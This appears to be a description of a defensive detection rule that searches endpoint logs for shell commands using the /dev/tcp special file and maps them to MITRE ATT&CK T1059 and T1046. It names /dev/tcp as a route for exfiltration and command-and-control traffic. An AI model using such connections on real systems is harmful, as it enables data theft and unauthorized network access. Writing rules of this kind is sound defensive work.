This detection rule targets the use of the Unix-based special file `/dev/tcp`, which allows for network connections to be initiated through shell commands. Such commands can be utilized by malicious actors to exfiltrate data, communicate with command-and-control servers, or perform unauthorized network activity. The rule leverages the command `get_endpoint_data` and `get_endpoint_data_unix` to pull relevant logs that contain the string `/dev/tcp`. It then formats the output into a table with the timestamp, host, user, and process details, along with statistical aggregations. This detection is aligned with techniques T1059 and T1046 from the MITRE ATT&CK framework, indicating it addresses command execution and network service discovery. The results are filtered for instances where the command process utilizes `/dev/tcp`, highlighting potential malicious activity that warrants further investigation.